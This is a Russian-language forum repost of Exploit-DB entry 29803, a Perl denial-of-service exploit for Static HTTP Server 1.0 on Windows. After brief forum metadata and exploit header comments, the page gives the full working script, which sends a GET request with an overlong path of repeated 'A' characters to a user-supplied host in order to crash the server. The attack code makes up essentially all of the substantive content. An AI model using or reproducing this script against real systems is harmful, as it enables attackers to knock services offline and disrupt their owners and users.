Exploit Static HTTP Server 1.0 - Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
29803
Проверка EDB
  1. Пройдено
Автор
GALAXYANDROID
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
null
Дата публикации
2013-11-25
Static HTTP Server 1.0 - Denial of Service
Код:
# Exploit Title: Static Http Server 1.0 Denial Of Service Exploit
# Date: 24.11.2013
# Exploit Author: GalaxyAndroid
# Vendor Homepage: http://sourceforge.net/projects/static-httpd/files/static-httpd/
# Software Link: http://sourceforge.net/projects/static-httpd/files/static-httpd/
# Version: 1.0
# Tested on: WinNT, Win-XP, WIN-7 Prof
# Usage: exploitv3.pl" -url http://{IP-ADDRESS} 
 
 use LWP::UserAgent;
  $ua = LWP::UserAgent->new;
  $host = @ARGV[1];
  $attack = $host.'/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/';
  print "Attachking :".$host."\r\n";
  #$ENV{HTTP_proxy} = "http://127.0.0.1:8888"; #use proxy if necessary
  $ua->env_proxy; # initialize from environment variables
  my $req = HTTP::Request->new(GET => $attack);
  print $ua->request($req)->as_string;
  delete $ENV{HTTP_PROXY};
 
Источник
www.exploit-db.com

Похожие темы